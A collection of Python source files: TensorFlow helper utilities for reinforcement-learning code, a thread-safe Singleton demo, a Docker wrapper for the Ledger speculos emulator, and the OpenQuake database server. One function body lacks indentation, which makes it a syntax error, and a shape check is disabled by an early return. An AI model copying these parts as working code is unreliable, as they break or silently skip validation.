    :param tensor: (TensorFlow Tensor) the input tensor
    :return: (TensorFlow Tensor) the flattened tensor
    """
    trailing = intprod(tensor.get_shape().as_list()[1:])
    return tf.reshape(tensor, [-1, trailing])
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(_vars):
    """
    Log variable name/parameter-count/shape information, for debug purposes.

    :param _vars: ([TensorFlow Tensor]) the variables
    """
    total_params = 0
    for variable in _vars:
        name = variable.name
        # skip optimizer slot variables
        if any(tag in name for tag in ("/Adam", "beta1_power", "beta2_power")):
            continue
        n_params = np.prod(variable.shape.as_list())
        total_params += n_params
        if "/b:" in name or "/biases" in name:
            continue  # Wx+b, bias is not interesting to look at => count params, but not print
        padding = " " * (55 - len(name))
        logger.info(" %s%s %i params %s" % (name, padding, n_params, str(variable.shape)))
    logger.info("Total model parameters: %0.2f million" % (total_params * 1e-6))
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None, var_list=None):
    """
    Load a TensorFlow saved model.

    :param fname: (str) the graph name
    :param sess: (TensorFlow Session) the session, if None: get_default_session()
    :param var_list: ([TensorFlow Tensor] or dict(str: TensorFlow Tensor)) A list of Variable/SaveableObject,
        or a dictionary mapping names to SaveableObject`s. If ``None``, defaults to the list of all saveable objects.
    """
    if sess is None:
        sess = tf.get_default_session()
    # avoid crashing when loading a bare name with no explicit directory
    if not os.path.dirname(fname):
        fname = os.path.join('./', fname)
    tf.train.Saver(var_list=var_list).restore(sess, fname)
def save_state(fname, sess=None, var_list=None):
    """
    Save a TensorFlow model.

    :param fname: (str) the graph name
    :param sess: (TensorFlow Session) The tf session, if None, get_default_session()
    :param var_list: ([TensorFlow Tensor] or dict(str: TensorFlow Tensor)) A list of Variable/SaveableObject,
        or a dictionary mapping names to SaveableObject`s. If ``None``, defaults to the list of all saveable objects.
    """
    if sess is None:
        sess = tf.get_default_session()
    dir_name = os.path.dirname(fname)
    # avoid crashing when saving a bare name with no explicit directory
    if dir_name == '':
        dir_name = './'
        fname = os.path.join(dir_name, fname)
    os.makedirs(dir_name, exist_ok=True)
    tf.train.Saver(var_list=var_list).save(sess, fname)
# ================================================================
# retrieving variables
# ================================================================
def get_trainable_vars(name):
    """
    Return the trainable variables inside the given scope.

    :param name: (str) the scope
    :return: ([TensorFlow Variable])
    """
    return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
def get_globals_vars(name):
    """
    returns the global variables (docstring previously said "trainable",
    but this queries tf.GraphKeys.GLOBAL_VARIABLES)

    :param name: (str) the scope
    :return: ([TensorFlow Variable])
    """
    return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
def outer_scope_getter(scope, new_scope=""):
    """
    Build a variable getter that strips one scope layer from variable names.

    :param scope: (str) the layer to remove
    :param new_scope: (str) optional replacement name
    :return: (function (function, str, ``*args``, ``**kwargs``): Tensorflow Tensor)
    """
    def _getter(getter, name, *args, **kwargs):
        # rewrite only the first occurrence of the scope prefix
        return getter(name.replace(scope + "/", new_scope, 1), *args, **kwargs)
    return _getter
def switch(condition, then_expression, else_expression):
    """Switches between two operations depending on a scalar value (int or bool).
    Note that both `then_expression` and `else_expression`
    should be symbolic tensors of the *same shape*.

    # Arguments
        condition: scalar tensor.
        then_expression: TensorFlow operation.
        else_expression: TensorFlow operation.
    """
    static_shape = copy.copy(then_expression.get_shape())
    chosen = tf.cond(tf.cast(condition, 'bool'),
                     lambda: then_expression,
                     lambda: else_expression)
    # restore the static shape that tf.cond discards
    chosen.set_shape(static_shape)
    return chosen
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
    """Leaky ReLU, branch-free: 0.5*(1+leak)*x + 0.5*(1-leak)*|x|."""
    return 0.5 * (1 + leak) * x + 0.5 * (1 - leak) * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
    """Huber loss: quadratic inside |x| < delta, linear outside.
    Reference: https://en.wikipedia.org/wiki/Huber_loss"""
    abs_x = tf.abs(x)
    return tf.where(abs_x < delta,
                    tf.square(x) * 0.5,
                    delta * (abs_x - 0.5 * delta))
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
    """Get default session or create one with a given config"""
    sess = tf.get_default_session()
    return sess if sess is not None else make_session(config=config, make_default=True)
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
    """Returns a session that will use <num_cpu> CPU's only"""
    if num_cpu is None:
        num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
    if config is None:
        config = tf.ConfigProto(
            allow_soft_placement=True,
            inter_op_parallelism_threads=num_cpu,
            intra_op_parallelism_threads=num_cpu)
    # don't pre-allocate all GPU memory
    config.gpu_options.allow_growth = True
    session_cls = tf.InteractiveSession if make_default else tf.Session
    return session_cls(config=config, graph=graph)
def single_threaded_session():
    """Returns a session which will only use a single CPU"""
    # delegate to make_session with one CPU thread
    return make_session(num_cpu=1)
def in_session(f):
    """Decorator that runs the wrapped call inside a fresh tf.Session."""
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        with tf.Session():
            f(*args, **kwargs)
    return wrapper
# Variables already initialised by initialize() below; shared across calls.
# NOTE(review): this re-binds the ALREADY_INITIALIZED defined earlier in this
# merged file, resetting that set.
ALREADY_INITIALIZED = set()
def initialize():
    """Initialize all the uninitialized variables in the global scope."""
    # only touch variables not initialised by a previous call
    pending = set(tf.global_variables()) - ALREADY_INITIALIZED
    get_session().run(tf.variables_initializer(pending))
    ALREADY_INITIALIZED.update(pending)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
    """Initializer drawing gaussian samples normalized along `axis` to norm `std`."""
    def _initializer(shape, dtype=None, partition_info=None):  # pylint: disable=W0613
        sample = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
        sample *= std / np.sqrt(np.square(sample).sum(axis=axis, keepdims=True))
        return tf.constant(sample)
    return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
           summary_tag=None):
    """Create a 2d convolutional layer under variable scope `name`.

    :param x: input tensor, NHWC
    :param num_filters: (int) number of output filters
    :param name: (str) variable scope
    :param filter_size: (tuple) filter height/width
    :param stride: (tuple) convolution stride
    :param pad: (str) 'VALID' or 'SAME'
    :param dtype: tensor data type
    :param collections: graph collection keys for the variables
    :param summary_tag: (str) image summary name, None for no summary
    :return: the convolution output tensor (conv + bias)
    """
    with tf.variable_scope(name):
        stride_shape = [1, stride[0], stride[1], 1]
        filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
        # there are "num input feature maps * filter height * filter width"
        # inputs to each hidden unit
        fan_in = intprod(filter_shape[:3])
        # each unit in the lower layer receives a gradient from:
        # "num output feature maps * filter height * filter width" / pooling size
        fan_out = intprod(filter_shape[:2]) * num_filters
        # initialize weights with random weights, bound sqrt(6/(fan_in+fan_out))
        w_bound = np.sqrt(6. / (fan_in + fan_out))
        w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
                            collections=collections)
        b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
                            collections=collections)
        if summary_tag is not None:
            # BUGFIX: tf.summary.image takes `max_outputs`; `max_images` is the
            # pre-1.0 argument name and raises TypeError on TF >= 1.0 (the
            # sibling conv2d earlier in this file already uses max_outputs).
            tf.summary.image(summary_tag,
                             tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
                                          [2, 0, 1, 3]),
                             max_outputs=10)
        return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
    """Just like Theano function. Take a bunch of tensorflow placeholders and
    expressions computed based on those placeholders and produce f(inputs) ->
    outputs. Input values can be passed positionally or as kwargs named after
    the placeholder (see _Function); the return mirrors the container type of
    `outputs` (list -> list, dict -> same dict type, single tensor -> value).

    Example:
        x = tf.placeholder(tf.int32, (), name="x")
        y = tf.placeholder(tf.int32, (), name="y")
        z = 3 * x + 2 * y
        lin = function([x, y], z, givens={y: 0})
        with single_threaded_session():
            initialize()
            assert lin(2) == 6
            assert lin(x=3) == 9
            assert lin(2, 2) == 10
            assert lin(x=2, y=3) == 12

    Parameters
    ----------
    inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
        list of input arguments
    outputs: [tf.Variable] or tf.Variable
        list of outputs or a single output to be returned from function. Returned
        value will also have the same shape.
    updates: [tf.Operation] or tf.Operation
        list of update functions or single update function that will be run whenever
        the function is called. The return is ignored.
    """
    if isinstance(outputs, (dict, collections.OrderedDict)):
        inner = _Function(inputs, outputs.values(), updates, givens=givens)
        return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), inner(*args, **kwargs)))
    if isinstance(outputs, list):
        return _Function(inputs, outputs, updates, givens=givens)
    inner = _Function(inputs, [outputs], updates, givens=givens)
    return lambda *args, **kwargs: inner(*args, **kwargs)[0]
class _Function(object):
    # Callable wrapping one sess.run over fixed outputs plus an update group;
    # unlike the earlier _Function in this file, this version also supports
    # feeding inputs by keyword, keyed on the placeholder's bare name.
    def __init__(self, inputs, outputs, updates, givens):
        for inpt in inputs:
            # accept feed-dict-aware objects, or tensors with no producing
            # inputs (i.e. placeholders and constants)
            if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
                assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
        self.inputs = inputs
        # map the bare placeholder name (scope prefix and ":0" stripped) to it
        self.input_names = {inp.name.split("/")[-1].split(":")[0]: inp for inp in inputs}
        updates = updates or []
        self.update_group = tf.group(*updates)
        self.outputs_update = list(outputs) + [self.update_group]
        self.givens = {} if givens is None else givens
    def _feed_input(self, feed_dict, inpt, value):
        if hasattr(inpt, 'make_feed_dict'):
            feed_dict.update(inpt.make_feed_dict(value))
        else:
            # NOTE(review): adjust_shape is defined elsewhere in this module
            # (beyond this view); presumably it coerces `value` to the
            # placeholder's expected shape — verify before relying on it
            feed_dict[inpt] = adjust_shape(inpt, value)
    def __call__(self, *args, **kwargs):
        assert len(args) + len(kwargs) <= len(self.inputs), "Too many arguments provided"
        feed_dict = {}
        # Update feed dict with givens.
        for inpt in self.givens:
            feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
        # Update the args (positional values overwrite givens defaults)
        for inpt, value in zip(self.inputs, args):
            self._feed_input(feed_dict, inpt, value)
        for inpt_name, value in kwargs.items():
            self._feed_input(feed_dict, self.input_names[inpt_name], value)
        # drop the final element (the update group's result)
        results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
        return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
    """Static shape of `x` as a list of ints; asserts it is fully known."""
    shape = x.get_shape().as_list()
    assert all(isinstance(dim, int) for dim in shape), \
        "shape function assumes that shape is fully known"
    return shape
def numel(x):
    """Total number of elements in a tensor with fully-known static shape."""
    return intprod(var_shape(x))
def intprod(x):
    """Product of all elements of a list, truncated to int."""
    return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
    """Gradients of `loss` w.r.t. `var_list`, optionally clipped by norm,
    concatenated into one flat vector (zeros where no gradient exists)."""
    grads = tf.gradients(loss, var_list)
    if clip_norm is not None:
        grads = [tf.clip_by_norm(g, clip_norm=clip_norm) for g in grads]
    pieces = []
    for var, grad in zip(var_list, grads):
        filled = grad if grad is not None else tf.zeros_like(var)
        pieces.append(tf.reshape(filled, [numel(var)]))
    return tf.concat(axis=0, values=pieces)
class SetFromFlat(object):
    """Op that scatters a flat parameter vector back into `var_list`.

    Calling the instance with a 1-D array of length sum(intprod(shape))
    assigns consecutive (reshaped) slices to each variable in order.
    """
    def __init__(self, var_list, dtype=tf.float32):
        # (the original initialized `assigns = []` twice; the first one was dead)
        shapes = list(map(var_shape, var_list))
        total_size = np.sum([intprod(shape) for shape in shapes])
        self.theta = theta = tf.placeholder(dtype, [total_size])
        start = 0
        assigns = []
        for (shape, v) in zip(shapes, var_list):
            size = intprod(shape)
            assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
            start += size
        self.op = tf.group(*assigns)

    def __call__(self, theta):
        # Runs in the default session, consistent with GetFlat below.
        tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
    """Op that reads all variables in `var_list` as one flat 1-D vector."""
    def __init__(self, var_list):
        flat_pieces = [tf.reshape(v, [numel(v)]) for v in var_list]
        self.op = tf.concat(axis=0, values=flat_pieces)

    def __call__(self):
        return tf.get_default_session().run(self.op)
def flattenallbut0(x):
    """Collapse every axis of *x* except the leading (batch) axis."""
    trailing_dims = x.get_shape().as_list()[1:]
    return tf.reshape(x, [-1, intprod(trailing_dims)])
# =============================================================
# TF placeholders management
# ============================================================
# Cache of reusable placeholders: name -> (placeholder, dtype, shape)
_PLACEHOLDER_CACHE = {}
def get_placeholder(name, dtype, shape):
    """Return a cached placeholder for *name*, creating it on first use.

    If the cached placeholder belongs to the current default graph, its
    dtype/shape must match the request. If it belongs to a different
    (stale) graph, a fresh placeholder silently replaces the cache entry.
    """
    if name in _PLACEHOLDER_CACHE:
        out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
        if out.graph == tf.get_default_graph():
            assert dtype1 == dtype and shape1 == shape, \
                'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
            return out
    out = tf.placeholder(dtype=dtype, shape=shape, name=name)
    _PLACEHOLDER_CACHE[name] = (out, dtype, shape)
    return out
def get_placeholder_cached(name):
    """Return the previously registered placeholder for *name* (KeyError if absent)."""
    placeholder, _dtype, _shape = _PLACEHOLDER_CACHE[name]
    return placeholder
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
    """Log name, parameter count and shape of each variable, plus a total.

    Optimizer slot variables (Adam moments, beta power accumulators) are
    skipped entirely; biases are counted in the total but not printed.
    """
    from baselines import logger
    total = 0
    for v in vars:
        name = v.name
        if "/Adam" in name or "beta1_power" in name or "beta2_power" in name:
            continue
        v_params = np.prod(v.shape.as_list())
        total += v_params
        if "/b:" in name or "/bias" in name:
            # Wx+b: biases are counted above but not worth printing.
            continue
        logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
    logger.info("Total model parameters: %0.2f million" % (total*1e-6))
def get_available_gpus(session_config=None):
    """Return the device names of all GPUs visible to TensorFlow.

    :param session_config: optional tf.ConfigProto; defaults to the config
        of the session returned by get_session().
    """
    # based on recipe from https://stackoverflow.com/a/38580201

    # Unless we allocate a session here, subsequent attempts to create one
    # will ignore our custom config (in particular, allow_growth=True will have
    # no effect).
    if session_config is None:
        session_config = get_session()._config  # private attr of tf.Session

    from tensorflow.python.client import device_lib
    local_device_protos = device_lib.list_local_devices(session_config)
    return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
    """Deprecated: restore all variables from the TF checkpoint *fname*.

    :param sess: session to restore into; defaults to get_session().
    """
    from baselines import logger
    logger.warn('load_state method is deprecated, please use load_variables instead')
    sess = sess or get_session()
    saver = tf.train.Saver()
    # Restore into the session resolved above; the original passed
    # tf.get_default_session() here, silently ignoring `sess`.
    saver.restore(sess, fname)
def save_state(fname, sess=None):
    """Deprecated: checkpoint all variables to *fname* via tf.train.Saver.

    :param sess: session to save from; defaults to get_session().
    """
    from baselines import logger
    logger.warn('save_state method is deprecated, please use save_variables instead')
    sess = sess or get_session()
    dirname = os.path.dirname(fname)
    # Create parent directories only when fname actually has a directory part
    # (the original used `any(dirname)`, iterating the string's characters).
    if dirname:
        os.makedirs(dirname, exist_ok=True)
    saver = tf.train.Saver()
    # Save from the session resolved above; the original passed
    # tf.get_default_session() here, silently ignoring `sess`.
    saver.save(sess, fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
    """Dump current values of *variables* (default: all global variables)
    to *save_path* as a joblib dict keyed by variable name.

    NOTE(review): `variables or ...` also replaces an explicitly passed
    empty list with all globals — confirm callers rely on this.
    """
    import joblib
    sess = sess or get_session()
    variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)

    ps = sess.run(variables)
    save_dict = {v.name: value for v, value in zip(variables, ps)}
    dirname = os.path.dirname(save_path)
    # Create parent directories only when save_path has a directory part
    # (the original used `any(dirname)`, iterating the string's characters).
    if dirname:
        os.makedirs(dirname, exist_ok=True)
    joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
    """Restore variable values dumped by save_variables (a joblib file).

    The dump may be either a list of arrays (matched to *variables* by
    position) or a dict keyed by variable name.
    """
    import joblib
    sess = sess or get_session()
    # NOTE(review): `variables or ...` also replaces an explicitly passed
    # empty list with all global variables.
    variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)

    loaded_params = joblib.load(os.path.expanduser(load_path))
    restores = []
    if isinstance(loaded_params, list):
        assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
        for d, v in zip(loaded_params, variables):
            restores.append(v.assign(d))
    else:
        for v in variables:
            restores.append(v.assign(loaded_params[v.name]))
    sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
    """Reshape *data* (a list or ndarray) so it can be fed into *placeholder*.

    Anything that is neither a list nor an ndarray is passed through
    untouched. Raises AssertionError when the shapes are incompatible.
    """
    if not isinstance(data, (np.ndarray, list)):
        return data
    if isinstance(data, list):
        data = np.array(data)
    # Unknown (None) dims become -1 so np.reshape can infer them.
    target_shape = [dim or -1 for dim in placeholder.shape.as_list()]

    assert _check_shape(target_shape, data.shape), \
        'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, target_shape)

    return np.reshape(data, target_shape)
def _check_shape(placeholder_shape, data_shape):
    ''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
    # NOTE(review): this early return disables the check entirely -- all the
    # code below it is dead. Presumably intentional (shape checking switched
    # off), but confirm before re-enabling it.
    return True
    squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
    squeezed_data_shape = _squeeze_shape(data_shape)

    for i, s_data in enumerate(squeezed_data_shape):
        s_placeholder = squeezed_placeholder_shape[i]
        if s_placeholder != -1 and s_data != s_placeholder:
            return False

    return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
    '''
    Spawn a detached `tensorboard` process serving *log_dir*.

    To log the Tensorflow graph when using rl-algs
    algorithms, you can run the following code
    in your main script:
        import threading, time

        def start_tensorboard(session):
            time.sleep(10) # Wait until graph is setup
            tb_path = osp.join(logger.get_dir(), 'tb')
            summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
            summary_op = tf.summary.merge_all()
            launch_tensorboard_in_background(tb_path)

        session = tf.get_default_session()
        t = threading.Thread(target=start_tensorboard, args=([session]))
        t.start()
    '''
    import subprocess
    cmd = ['tensorboard', '--logdir', log_dir]
    subprocess.Popen(cmd)
|
Singleton.py | import threading
class Singleton(object):
    """Process-wide singleton: every construction yields the same object.

    Double-checked locking keeps the common (already-created) path
    lock-free while making creation race-free across threads.
    """
    _instance_lock = threading.Lock()

    def __new__(cls, *args, **kwargs):
        inst = getattr(Singleton, "_instance", None)
        if inst is None:
            with Singleton._instance_lock:
                # Re-check under the lock: another thread may have won the race.
                inst = getattr(Singleton, "_instance", None)
                if inst is None:
                    inst = object.__new__(cls)
                    Singleton._instance = inst
        return inst
# Module-level smoke test: both constructions must yield the same object.
obj1 = Singleton()
obj2 = Singleton()
print(obj1, obj2)
def task(arg):
    """Thread target: constructing Singleton returns the shared instance."""
    instance = Singleton()
    print(instance)
# Spawn ten threads; each should print the identical singleton instance.
for i in range(10):
    t = threading.Thread(target=task, args=[i, ])
    t.start()
|
speculos.py | import os.path
import threading
import socket
import atexit
import logging
import docker
from . import dongle
# Re-export so callers can catch communication errors via this module.
CommException = dongle.CommException

logger = logging.getLogger('speculos')
class SpeculosContainer:
    """
    `SpeculosContainer` handles running the Bolos App under test within
    the `speculos` Docker image.

    A `SpeculosContainer` instance is constructed with the Bolos App ELF
    filename passed as `app` argument and with an optional tcp port passed
    as `apdu_port` argument.

    The Docker container mounts the directory of the `app` within the
    container on the `/app` mountpoint and exposes the `apdu_port` as tcp
    port linked to the default Speculos APDU port (9999).

    The `start()` method starts running the container and starts a background
    thread that reads and logs `stdout` and `stderr` output logs from the
    container. Note that speculos is run in `headless` display mode.

    Besides the `connect()` method creates a `ledgerblue` tcp connection to
    the `speculos` process through the `apdu_port` tcp port.
    """

    def __init__(self, app, apdu_port=9999,
                 automation_port=None, button_port=None):
        # Host-side ports; automation/button default to the two ports
        # directly above the APDU port.
        self.app = app
        self.apdu_port = apdu_port
        self.automation_port = automation_port or (apdu_port + 1)
        self.button_port = button_port or (apdu_port + 2)
        self.docker = docker.from_env().containers
        self.container = None  # set by start()

    def start(self):
        """Run the speculos container and begin streaming its logs."""
        self.container = self._run_speculos_container()
        self.log_handler = self._log_speculos_output(self.container)
        # Ensure the container is stopped even on interpreter exit.
        atexit.register(self.stop)
        logger.info("Started docker container: %s (%s)"
                    % (self.container.image, self.container.name))

    def stop(self):
        """Stop the container and wait for the log thread to drain."""
        logger.info("Stopping docker container: %s (%s)..."
                    % (self.container.image, self.container.name))
        self.container.stop()
        self.log_handler.join()

    def connect(self, debug=False):
        """Return a Dongle connected to speculos over the APDU port."""
        if self.container is None:
            raise dongle.CommException("speculos not started yet")
        return dongle.Dongle(self.apdu_port,
                             self.automation_port,
                             self.button_port,
                             debug=debug)

    def _run_speculos_container(self):
        # The app's directory is bind-mounted read-only at /app; the fixed
        # in-container ports (9999/10000/10001) are mapped to the host
        # ports chosen in __init__.
        appdir = os.path.abspath(os.path.dirname(self.app))
        args = [
            '--display headless',
            '--apdu-port 9999',
            '--automation-port 10000',
            '--button-port 10001',
            '--log-level button:DEBUG',
            '--sdk 2.0',
            '/app/%s' % os.path.basename(self.app)
        ]
        c = self.docker.create(image='ledgerhq/speculos',
                               command=' '.join(args),
                               volumes={appdir: {'bind': '/app', 'mode': 'ro'}},
                               ports={
                                   '9999/tcp': self.apdu_port,
                                   '10000/tcp': self.automation_port,
                                   '10001/tcp': self.button_port,
                               })
        c.start()
        return c

    def _log_speculos_output(self, container):
        # Synchronize on first log output from container
        cv = threading.Condition()
        started = False

        def do_log():
            for log in container.logs(stream=True, follow=True):
                nonlocal started
                if not started:
                    with cv:
                        started = True
                        cv.notify()
                logger.info(log.decode('utf-8').strip('\n'))

        t = threading.Thread(target=do_log, daemon=True)
        t.start()
        # Block until the container produced at least one log line,
        # i.e. speculos is actually up.
        with cv:
            while not started:
                cv.wait()
        return t
|
dbserver.py | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2016-2018 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import time
import sqlite3
import logging
import threading
import subprocess
from openquake.baselib import config, sap, zeromq as z, workerpool as w
from openquake.baselib.general import socket_ready, detach_process
from openquake.baselib.parallel import safely_call
from openquake.commonlib import logs
from openquake.server.db import actions
from openquake.server import dbapi
from openquake.server import __file__ as server_path
# Database handle shared by the worker threads; detect_types lets sqlite3
# round-trip declared column types (e.g. timestamps).
# NB: the timeout was increased from 5 to 20 seconds to see if the random
# OperationalError: "database is locked" disappears in the WebUI tests.
db = dbapi.Db(sqlite3.connect, os.path.expanduser(config.dbserver.file),
              isolation_level=None, detect_types=sqlite3.PARSE_DECLTYPES,
              timeout=20)
# Shortcut: db.cmd('action', ...) dispatches to openquake.server.db.actions.
db.cmd = lambda action, *args: getattr(actions, action)(db, *args)

# True when tasks are distributed through zeromq workers.
ZMQ = os.environ.get(
    'OQ_DISTRIBUTE', config.distribution.oq_distribute) == 'zmq'

# The environment variable wins over the configuration file.
DBSERVER_PORT = int(os.environ.get('OQ_DBSERVER_PORT') or config.dbserver.port)
class DbServer(object):
    """
    A server collecting the received commands into a queue.

    Commands arrive on a ROUTER frontend socket and are proxied to
    `num_workers` REP worker threads over an in-process DEALER backend.
    """
    def __init__(self, db, address, num_workers=5):
        self.db = db
        self.master_host = address[0]
        self.frontend = 'tcp://%s:%s' % address  # client-facing endpoint
        self.backend = 'inproc://dbworkers'      # in-process worker endpoint
        self.num_workers = num_workers
        self.pid = os.getpid()
        self.master = w.WorkerMaster(**config.zworkers)

    def dworker(self, sock):
        # a database worker responding to commands
        with sock:
            for cmd_ in sock:
                cmd, args = cmd_[0], cmd_[1:]
                if cmd == 'getpid':
                    sock.send(self.pid)
                    continue
                try:
                    func = getattr(actions, cmd)
                except AttributeError:
                    sock.send('Invalid command ' + cmd)
                else:
                    # safely_call wraps exceptions so they travel back to
                    # the client instead of killing the worker thread.
                    sock.send(safely_call(func, (self.db,) + args))

    def start(self):
        """
        Start database worker threads, the optional zmq machinery, and
        then block in the frontend->backend proxy until interrupted.
        """
        # give a nice name to the process
        w.setproctitle('oq-dbserver')
        dworkers = []
        for _ in range(self.num_workers):
            sock = z.Socket(self.backend, z.zmq.REP, 'connect')
            threading.Thread(target=self.dworker, args=(sock,)).start()
            dworkers.append(sock)
        logging.warn('DB server started with %s on %s, pid %d',
                     sys.executable, self.frontend, self.pid)
        if ZMQ:
            # start task_in->task_out streamer thread
            c = config.zworkers
            threading.Thread(
                target=w.streamer,
                args=(self.master_host, c.task_in_port, c.task_out_port)
            ).start()
            logging.warn('Task streamer started from %s -> %s',
                         c.task_in_port, c.task_out_port)

            # start zworkers and wait a bit for them
            msg = self.master.start()
            logging.warn(msg)
            time.sleep(1)

        # start frontend->backend proxy for the database workers
        try:
            z.zmq.proxy(z.bind(self.frontend, z.zmq.ROUTER),
                        z.bind(self.backend, z.zmq.DEALER))
        except (KeyboardInterrupt, z.zmq.ZMQError):
            for sock in dworkers:
                sock.running = False  # tell worker loops to stop iterating
            logging.warn('DB server stopped')
        finally:
            self.stop()

    def stop(self):
        """Stop the DbServer and the zworkers if any"""
        if ZMQ:
            logging.warn(self.master.stop())
            z.context.term()
        self.db.close()
def different_paths(path1, path2):
    """True unless *path1* and *path2* name the same module file.

    Symlinks are resolved and the extension is ignored, so x.py and its
    compiled x.pyc compare equal.
    """
    real1 = os.path.realpath(path1)  # expand symlinks
    real2 = os.path.realpath(path2)  # expand symlinks
    # don't care about the extension (it may be .py or .pyc)
    stem1 = os.path.splitext(real1)[0]
    stem2 = os.path.splitext(real2)[0]
    return stem1 != stem2
def get_status(address=None):
    """
    Check if the DbServer is up.

    :param address: pair (hostname, port)
    :returns: 'running' or 'not-running'
    """
    addr = address if address else (config.dbserver.host, DBSERVER_PORT)
    if socket_ready(addr):
        return 'running'
    return 'not-running'
def check_foreign():
    """
    Check that the DbServer we are talking to belongs to this installation.

    Returns an error-message string when a foreign DbServer is detected,
    otherwise None (implicitly).
    """
    if not config.dbserver.multi_user:
        remote_server_path = logs.dbcmd('get_path')
        if different_paths(server_path, remote_server_path):
            # NB: parsed as return ((template) % args) -- the % binds to the
            # whole parenthesized string, not to the return statement.
            return('You are trying to contact a DbServer from another'
                   ' instance (got %s, expected %s)\n'
                   'Check the configuration or stop the foreign'
                   ' DbServer instance') % (remote_server_path, server_path)
def ensure_on():
    """
    Start the DbServer if it is off; in multi_user mode just bail out,
    since starting it is the administrator's job.
    """
    if get_status() == 'not-running':
        if config.dbserver.multi_user:
            sys.exit('Please start the DbServer: '
                     'see the documentation for details')
        # otherwise start the DbServer automatically; NB: I tried to use
        # multiprocessing.Process(target=run_server).start() and apparently
        # it works, but then run-demos.sh hangs after the end of the first
        # calculation, but only if the DbServer is started by oq engine (!?)
        subprocess.Popen([sys.executable, '-m', 'openquake.server.dbserver',
                          '-l', 'INFO'])

        # wait for the dbserver to start, polling once per second
        waiting_seconds = 10
        while get_status() == 'not-running':
            if waiting_seconds == 0:
                sys.exit('The DbServer cannot be started after 10 seconds. '
                         'Please check the configuration')
            time.sleep(1)
            waiting_seconds -= 1
@sap.Script
def run_server(dbpath=os.path.expanduser(config.dbserver.file),
               dbhostport=None, logfile=config.dbserver.log,
               loglevel='WARN'):
    """
    Run the DbServer on the given database file and port. If not given,
    use the settings in openquake.cfg.

    NB: the defaults are evaluated once, at import time, from the
    configuration then in force.
    """
    if dbhostport:  # assume a string of the form "dbhost:port"
        dbhost, port = dbhostport.split(':')
        addr = (dbhost, int(port))
    else:
        addr = (config.dbserver.host, DBSERVER_PORT)

    # create the db directory if needed
    dirname = os.path.dirname(dbpath)
    if not os.path.exists(dirname):
        os.makedirs(dirname)

    # create and upgrade the db if needed
    db('PRAGMA foreign_keys = ON')  # honor ON DELETE CASCADE
    actions.upgrade_db(db)
    # the line below is needed to work around a very subtle bug of sqlite;
    # we need new connections, see https://github.com/gem/oq-engine/pull/3002
    db.close()

    # reset any computation left in the 'executing' state
    actions.reset_is_running(db)

    # configure logging and start the server
    logging.basicConfig(level=getattr(logging, loglevel), filename=logfile)
    DbServer(db, addr).start()  # expects to be killed with CTRL-C
# Command-line argument/option declarations consumed by the sap.Script
